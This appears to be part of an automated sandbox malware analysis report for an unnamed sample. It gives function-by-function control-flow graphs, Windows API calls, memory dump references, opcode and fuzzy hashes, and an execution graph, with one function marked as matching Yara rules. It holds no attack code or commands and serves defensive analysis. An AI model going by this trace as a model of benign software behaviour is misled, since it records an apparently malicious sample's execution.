                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1002 14644b4-14659b9 CreateActCtxA 1005 14659c2-1465a1c 1002->1005 1006 14659bb-14659c1 1002->1006 1013 1465a1e-1465a21 1005->1013 1014 1465a2b-1465a2f 1005->1014 1006->1005 1013->1014 1015 1465a40 1014->1015 1016 1465a31-1465a3d 1014->1016 1018 1465a41 1015->1018 1016->1015 1018->1018
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 014659A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: c46ba3c45507feb8efedf509eb73a5ea6ec9e39abdf2b441143b320bf92860f4
                                                                                  • Instruction ID: d2ddaa8a9709ed5fc95b2fc4e6e22f6f7777ab51a4527cb059840090ccf99822
                                                                                  • Opcode Fuzzy Hash: c46ba3c45507feb8efedf509eb73a5ea6ec9e39abdf2b441143b320bf92860f4
                                                                                  • Instruction Fuzzy Hash: 6441F5B0D0071DCFDB24DFA9C88478EBBB6BF88704F20816AD408AB251DB715945CF91
                                                                                  Function 014658ED Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1019 14658ed-14659b9 CreateActCtxA 1021 14659c2-1465a1c 1019->1021 1022 14659bb-14659c1 1019->1022 1029 1465a1e-1465a21 1021->1029 1030 1465a2b-1465a2f 1021->1030 1022->1021 1029->1030 1031 1465a40 1030->1031 1032 1465a31-1465a3d 1030->1032 1034 1465a41 1031->1034 1032->1031 1034->1034
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 014659A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 17319606dc85cc23a12be2771ce35b85809b6a3ba94f6e7b9a09edf55fe4ab21
                                                                                  • Instruction ID: 3a70f12fed948cf4caef30ac4a753e775e99eaa2d45121b6f5a9552c328e64b6
                                                                                  • Opcode Fuzzy Hash: 17319606dc85cc23a12be2771ce35b85809b6a3ba94f6e7b9a09edf55fe4ab21
                                                                                  • Instruction Fuzzy Hash: AA41F2B1D00719CFDB24DFA9C88478EBBB6BF89704F20816AD408AB251DB756946CF91
                                                                                  Function 07320D88 Relevance: 1.6, APIs: 1, Instructions: 81windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1035 7320d88-7320d9a 1036 7320da2-7320dad 1035->1036 1045 7320d9d call 7320d78 1035->1045 1046 7320d9d call 7320d88 1035->1046 1037 7320dc2-7320e54 CreateIconFromResourceEx 1036->1037 1038 7320daf-7320dbf 1036->1038 1041 7320e56-7320e5c 1037->1041 1042 7320e5d-7320e7a 1037->1042 1041->1042 1045->1036 1046->1036
                                                                                  APIs
                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 07320E47
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFromIconResource
                                                                                  • String ID:
                                                                                  • API String ID: 3668623891-0
                                                                                  • Opcode ID: f7231c008288de41453aa2d08d53a31b57c664a7bcae911b95a0c5d463d889eb
                                                                                  • Instruction ID: db632c217ebb7491e8a5864eb54db118fe6c140eb5cd5e827714e690613a3b32
                                                                                  • Opcode Fuzzy Hash: f7231c008288de41453aa2d08d53a31b57c664a7bcae911b95a0c5d463d889eb
                                                                                  • Instruction Fuzzy Hash: 8131ABB29003599FDB11CFAAC804ADEBFF8EF09310F04845AE558A7221C3359955DFA1
                                                                                  Function 0146D520 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1047 146d520-146d5bc DuplicateHandle 1048 146d5c5-146d5e2 1047->1048 1049 146d5be-146d5c4 1047->1049 1049->1048
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0146D4EE,?,?,?,?,?), ref: 0146D5AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 0ad83654ca0a4c24e3f3595c4cd18759139ab66ec144dc45762a1a62fbe7218e
                                                                                  • Instruction ID: 2a8f9ab9c553f7ee86582d238782c2b64a2666f20acf7d7296a5839fe9acfdfe
                                                                                  • Opcode Fuzzy Hash: 0ad83654ca0a4c24e3f3595c4cd18759139ab66ec144dc45762a1a62fbe7218e
                                                                                  • Instruction Fuzzy Hash: 3F21E3B5900209DFDB10CFAAD984ADEBBF9FB48314F14841AE958A3350D374A954CFA1
                                                                                  Function 0146AF34 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1052 146af34-146d5bc DuplicateHandle 1054 146d5c5-146d5e2 1052->1054 1055 146d5be-146d5c4 1052->1055 1055->1054
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0146D4EE,?,?,?,?,?), ref: 0146D5AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 9ed494ca6befe79dc904594f29742db173e2949e6bdf115e5128af9ea6921237
                                                                                  • Instruction ID: 25c1594c01354dc2ef908b380b4425a9f4db8a99ed5e79cc6a387780baa597af
                                                                                  • Opcode Fuzzy Hash: 9ed494ca6befe79dc904594f29742db173e2949e6bdf115e5128af9ea6921237
                                                                                  • Instruction Fuzzy Hash: 1221E5B5D002099FDB10CF9AD484ADEBBF8EB48314F14841AE958A3350D374A955CFA5
                                                                                  Function 0146B238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1058 146b238-146b278 1059 146b280-146b2ab GetModuleHandleW 1058->1059 1060 146b27a-146b27d 1058->1060 1061 146b2b4-146b2c8 1059->1061 1062 146b2ad-146b2b3 1059->1062 1060->1059 1062->1061
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0146B29E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 0550fcbd6ab569cebc90a5e5a0179d58ed8fe57e7443ecd775a91c364192190b
                                                                                  • Instruction ID: 8cca33bd818fe558ea9bbe6fd061a1a1b6db2911278035182b3fa7565a854f39
                                                                                  • Opcode Fuzzy Hash: 0550fcbd6ab569cebc90a5e5a0179d58ed8fe57e7443ecd775a91c364192190b
                                                                                  • Instruction Fuzzy Hash: 7C11DFB5D002498FDB24DF9AC444A9EFBF8EF88324F10842AD929A7610C379A545CFA1
                                                                                  Function 0732223C Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1126 732223c-7322c6d CloseHandle 1128 7322c76-7322c9e 1126->1128 1129 7322c6f-7322c75 1126->1129 1129->1128
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07322AB9,?,?), ref: 07322C60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 717e0f0cb0a467fb73d761c5bd33f2bf1ea79f5eef254f17c998725945986bdf
                                                                                  • Instruction ID: b9f88d4baa8f899fa6d5cfef014989c765506b3d9203ffe201eccb304cd18b02
                                                                                  • Opcode Fuzzy Hash: 717e0f0cb0a467fb73d761c5bd33f2bf1ea79f5eef254f17c998725945986bdf
                                                                                  • Instruction Fuzzy Hash: FD1143B58007198FDB20DF9AC484BAEBBF4FB48320F108419D558A7240C778A945CFA1
                                                                                  Function 07322C01 Relevance: 1.3, APIs: 1, Instructions: 46COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1132 7322c01-7322c6d CloseHandle 1133 7322c76-7322c9e 1132->1133 1134 7322c6f-7322c75 1132->1134 1134->1133
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07322AB9,?,?), ref: 07322C60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 366436169c395bf02dfcae77318aab74e6a54dd4718ec81c93892c9367340e31
                                                                                  • Instruction ID: 931de178a2a14c8cef4ebdc2a64c8b9f3a910f7eedfd7af6f61921d5317b5747
                                                                                  • Opcode Fuzzy Hash: 366436169c395bf02dfcae77318aab74e6a54dd4718ec81c93892c9367340e31
                                                                                  • Instruction Fuzzy Hash: 721122B5800219CFDB20DF9AC585BEEBBF4FF48320F20841AD568A7250D338A545CFA5
                                                                                  Function 0140D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415651275.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_140d000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2f22a4f5745aa2adc92de7c22d509b8480b8b5428f1e99da342002196f99e5db
                                                                                  • Instruction ID: f75ad968f4a35b43d25e3ce4e04397f85445ff40ddd704985ec5a5b20577146a
                                                                                  • Opcode Fuzzy Hash: 2f22a4f5745aa2adc92de7c22d509b8480b8b5428f1e99da342002196f99e5db
                                                                                  • Instruction Fuzzy Hash: 9321F475904204DFDB06DF95D9C4B56BB65FB84324F20C17AE9090B3A6C336E45ACAA2
                                                                                  Function 0141D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415687899.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_141d000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 31f790a5027f5497cd106b1922bdd94a14547b7156e930a9c92d3b969c37fbd7
                                                                                  • Instruction ID: 39ff027969ff3973c9e2897c366211f9edc63780b840b464dc7107d0f221c6e3
                                                                                  • Opcode Fuzzy Hash: 31f790a5027f5497cd106b1922bdd94a14547b7156e930a9c92d3b969c37fbd7
                                                                                  • Instruction Fuzzy Hash: 4C2129B5A04304DFDB05DF94D9C8B56BBA5FB84324F20C66ED8494B36AC336D446CB61
                                                                                  Function 0141D01C Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415687899.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_141d000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 213943eb7e8ae83f642dee6fc24e8ceffb6d435a385ba7bbf0225c8dd1dbfd7a
                                                                                  • Instruction ID: 14f955145258dff73bda5232b73e64d86859c521be9eb84448d8269d6bb7ba92
                                                                                  • Opcode Fuzzy Hash: 213943eb7e8ae83f642dee6fc24e8ceffb6d435a385ba7bbf0225c8dd1dbfd7a
                                                                                  • Instruction Fuzzy Hash: F62100F5A04300DFDB15DF54D988B16BFA1FB84218F20C56ED80A0B3AAC33AD447CA62
                                                                                  Function 0141D006 Relevance: .1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415687899.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_141d000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5cff5d27c5fca1d0f829e7d35fda7472242dbca63a9f33b28c8b844e77846cdc
                                                                                  • Instruction ID: 3830902394c5e17bd72c0f22315c643501e2c96a496c5cac38347c1cdf3795a1
                                                                                  • Opcode Fuzzy Hash: 5cff5d27c5fca1d0f829e7d35fda7472242dbca63a9f33b28c8b844e77846cdc
                                                                                  • Instruction Fuzzy Hash: 672192B55093808FDB07CF24D594716BF71EB46214F28C5DBD8498F2A7C33A980ACB62
                                                                                  Function 0140D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415651275.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_140d000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                  • Instruction ID: c35eb1a401f6c323f01b779e03256d1fca997395cac1e1066941c091acf5435c
                                                                                  • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                  • Instruction Fuzzy Hash: 7911C076904240CFCB02CF44D5C0B56BF61FB84224F2482BAD8090A267C33AD45ACB91
                                                                                  Function 0141D1CF Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415687899.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_141d000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                  • Instruction ID: 400135fc2fe05cc84227f4b5418530bf6a5b7eb6a52cad1d6c74dce9db25ada0
                                                                                  • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                  • Instruction Fuzzy Hash: F511BEB5904280DFCB02CF54C5C4B16BBA1FB84224F24C6AED8494B7A6C33AD40ACB51
                                                                                  Function 0140D731 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415651275.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_140d000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dc203fdc2150e3eb1a6438b49878aff3ab60e7fe169041d3718506faee1b87bd
                                                                                  • Instruction ID: b36e2267f73d929bf8169ecf75d2cae6c0fd0ee5f6b96009902e629c7b8f6720
                                                                                  • Opcode Fuzzy Hash: dc203fdc2150e3eb1a6438b49878aff3ab60e7fe169041d3718506faee1b87bd
                                                                                  • Instruction Fuzzy Hash: F60184718043849AE7155AA6CD84B67BF98EF85625F14C43AED094B2D2C2789845CB72
                                                                                  Function 0140D730 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415651275.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_140d000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1f2c423e437a88043fc40de24eab62bf60b8c9b37325f4d56d9ff1b5421ca0d4
                                                                                  • Instruction ID: bdd8c3b93739f545cfc19f45e4c079bb00b05634778728ce25fd74bd5f8f6a75
                                                                                  • Opcode Fuzzy Hash: 1f2c423e437a88043fc40de24eab62bf60b8c9b37325f4d56d9ff1b5421ca0d4
                                                                                  • Instruction Fuzzy Hash: CFF0C232404384AEE7158A5AC884B63FFD8EF80734F18C46AED084B2D2C2789844CB71

                                                                                  Non-executed Functions

                                                                                  Function 0146DE34 Relevance: .3, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d77d28f30ab4814548285d023f9aa02b2c1f9a6afe9a70cf812f0610389915d9
                                                                                  • Instruction ID: 54c85260722b9f4359cbc726d1bc19578c77e74d0a2902164fcfa6ba6e8913bf
                                                                                  • Opcode Fuzzy Hash: d77d28f30ab4814548285d023f9aa02b2c1f9a6afe9a70cf812f0610389915d9
                                                                                  • Instruction Fuzzy Hash: 50A1AF32F0061A8FCF15DFB5D88059EBBB6FFA4304B15456AE905AB275DB31E906CB80
                                                                                  Function 0732BAAE Relevance: .2, Instructions: 240COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2fe8663f5087451b0c6f20cb5beaee37a3931fccbebfd155b566484f55be639d
                                                                                  • Instruction ID: c609e4f026cdabc5d56bb672dff1a4d9c0b912bb7abc46b3aa629480dc303840
                                                                                  • Opcode Fuzzy Hash: 2fe8663f5087451b0c6f20cb5beaee37a3931fccbebfd155b566484f55be639d
                                                                                  • Instruction Fuzzy Hash: 64B1A6B5E016688FDB58CF6AC9446DDBBF2BF89300F14C1AAD409AB365DB305A858F50
                                                                                  Function 0732B3C9 Relevance: .2, Instructions: 161COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d2ea1f32a24adbe57d2f4e3183a89fe62dafe5dc2a92fe46a59d497d90c9836
                                                                                  • Instruction ID: c6207fb1bb786c04df8c2b3a5637ad3eee0bca3949bea29da6a4e9d0dc71e5c3
                                                                                  • Opcode Fuzzy Hash: 1d2ea1f32a24adbe57d2f4e3183a89fe62dafe5dc2a92fe46a59d497d90c9836
                                                                                  • Instruction Fuzzy Hash: CA611BB0A112198FE708EF7BE94569ABFF6FBC8301F14C529D4099B268EF706915DB40
                                                                                  Function 0732B3D8 Relevance: .2, Instructions: 159COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11fe8d187d12c968e7f2d30fd45e1cc3135e9bb74205ea71475503d596eb113e
                                                                                  • Instruction ID: 2b71e4ebfec99bc0ffb9a4fbc03baa491721af525d761ba3eaabc67bd4f32569
                                                                                  • Opcode Fuzzy Hash: 11fe8d187d12c968e7f2d30fd45e1cc3135e9bb74205ea71475503d596eb113e
                                                                                  • Instruction Fuzzy Hash: 95610AB0A102198FE708EF7BE84569ABFF6FBC8301F14C529D4099B268EF706815DB40

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.2%
                                                                                  Dynamic/Decrypted Code Coverage:4.9%
                                                                                  Signature Coverage:7.7%
                                                                                  Total number of Nodes:142
                                                                                  Total number of Limit Nodes:11
                                                                                  execution_graph 95261 42bf23 95262 42bf40 95261->95262 95265 f82df0 LdrInitializeThunk 95262->95265 95263 42bf65 95265->95263 95266 424be3 95267 424bff 95266->95267 95268 424c27 95267->95268 95269 424c3b 95267->95269 95270 42c8c3 NtClose 95268->95270 95276 42c8c3 95269->95276 95272 424c30 95270->95272 95273 424c44 95279 42ea73 RtlAllocateHeap 95273->95279 95275 424c4f 95277 42c8e0 95276->95277 95278 42c8ee NtClose 95277->95278 95278->95273 95279->95275 95280 424f83 95281 424f9c 95280->95281 95282 424fe7 95281->95282 95285 42502a 95281->95285 95287 42502f 95281->95287 95288 42e953 95282->95288 95286 42e953 RtlFreeHeap 95285->95286 95286->95287 95291 42cc03 95288->95291 95290 424ff7 95292 42cc20 95291->95292 95293 42cc2e RtlFreeHeap 95292->95293 95293->95290 95304 42f9f3 95305 42fa03 95304->95305 95306 42fa09 95304->95306 95309 42ea33 95306->95309 95308 42fa2f 95312 42cbc3 95309->95312 95311 42ea4e 95311->95308 95313 42cbdd 95312->95313 95314 42cbeb RtlAllocateHeap 95313->95314 95314->95311 95294 4141c3 95295 4141d4 95294->95295 95300 417993 95295->95300 95297 4141fb 95298 414240 95297->95298 95299 41422f PostThreadMessageW 95297->95299 95299->95298 95301 417996 95300->95301 95302 4179f3 LdrLoadDll 95301->95302 95303 4179be 95301->95303 95302->95303 95303->95297 95315 41b4b3 95316 41b4f7 95315->95316 95317 42c8c3 NtClose 95316->95317 95318 41b518 95316->95318 95317->95318 95319 41e6b3 95320 41e6d9 95319->95320 95324 41e7d6 95320->95324 95325 42fb23 95320->95325 95322 41e774 95322->95324 95331 42bf73 95322->95331 95326 42fa93 95325->95326 95327 42faf0 95326->95327 95328 42ea33 RtlAllocateHeap 95326->95328 95327->95322 95329 42facd 95328->95329 95330 42e953 RtlFreeHeap 95329->95330 95330->95327 95332 42bf90 95331->95332 95335 f82c0a 95332->95335 95333 42bfb9 95333->95324 95336 f82c1f LdrInitializeThunk 95335->95336 95337 f82c11 95335->95337 95336->95333 95337->95333 95338 418f55 95339 42c8c3 NtClose 95338->95339 95340 418f5f 95339->95340 95341 4019d4 95342 4019df 95341->95342 95345 42fec3 95342->95345 95348 42e513 95345->95348 95349 42e539 95348->95349 95360 4072b3 95349->95360 95351 42e54f 95359 401a2d 95351->95359 95363 41b2c3 95351->95363 95353 42e56e 95356 42e583 95353->95356 95378 42cc53 95353->95378 95374 4284d3 95356->95374 95357 42e59d 95358 42cc53 ExitProcess 95357->95358 95358->95359 95381 416643 95360->95381 95362 4072c0 95362->95351 95364 41b2ef 95363->95364 95392 41b1b3 95364->95392 95367 41b334 95370 41b350 95367->95370 95372 42c8c3 NtClose 95367->95372 95368 41b31c 95369 41b327 95368->95369 95371 42c8c3 NtClose 95368->95371 95369->95353 95370->95353 95371->95369 95373 41b346 95372->95373 95373->95353 95375 428535 95374->95375 95377 428542 95375->95377 95403 418813 95375->95403 95377->95357 95379 42cc70 95378->95379 95380 42cc81 ExitProcess 95379->95380 95380->95356 95382 41665d 95381->95382 95384 416673 95382->95384 95385 42d2f3 95382->95385 95384->95362 95386 42d30d 95385->95386 95387 42d33c 95386->95387 95388 42bf73 LdrInitializeThunk 95386->95388 95387->95384 95389 42d396 95388->95389 95390 42e953 RtlFreeHeap 95389->95390 95391 42d3ac 95390->95391 95391->95384 95393 41b2a9 95392->95393 95394 41b1cd 95392->95394 95393->95367 95393->95368 95398 42c013 95394->95398 95397 42c8c3 NtClose 95397->95393 95399 42c030 95398->95399 95402 f835c0 LdrInitializeThunk 95399->95402 95400 41b29d 95400->95397 95402->95400 95404 41883d 95403->95404 95410 418d3b 95404->95410 95411 413e23 95404->95411 95406 41896a 95407 42e953 RtlFreeHeap 95406->95407 95406->95410 95408 418982 95407->95408 95409 42cc53 ExitProcess 95408->95409 95408->95410 95409->95410 95410->95377 95415 413e43 95411->95415 95413 413eac 95413->95406 95415->95413 95416 41b5d3 95415->95416 95417 41b5f8 95416->95417 95423 429c73 95417->95423 95419 413ea2 95419->95406 95421 41b629 95421->95419 95422 42e953 RtlFreeHeap 95421->95422 95428 41b413 LdrInitializeThunk 95421->95428 95422->95421 95424 429cd8 95423->95424 95425 429d0b 95424->95425 95429 413c83 95424->95429 95425->95421 95427 429ced 95427->95421 95428->95421 95432 413c4e 95429->95432 95433 413d0d 95432->95433 95434 42cb33 95432->95434 95433->95427 95435 42cb4d 95434->95435 95438 f82c70 LdrInitializeThunk 95435->95438 95436 413c62 95436->95427 95438->95436 95439 f82b60 LdrInitializeThunk

                                                                                  Executed Functions

                                                                                  Function 00417993 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 114 417993-4179bc call 42f533 118 4179c2-4179d0 call 42fb33 114->118 119 4179be-4179c1 114->119 122 4179e0-4179f1 call 42dfe3 118->122 123 4179d2-4179dd call 42fdd3 118->123 128 4179f3-417a07 LdrLoadDll 122->128 129 417a0a-417a0d 122->129 123->122 128->129
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                  • Instruction ID: c05735af9d87ff809b405e5c58a4850cca5856ce1274a566620df5b546512d83
                                                                                  • Opcode Fuzzy Hash: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                  • Instruction Fuzzy Hash: 290171B1E0020DBBDF10DBE5DC42FDEB7B89B54308F4041AAE90897240F634EB488B95
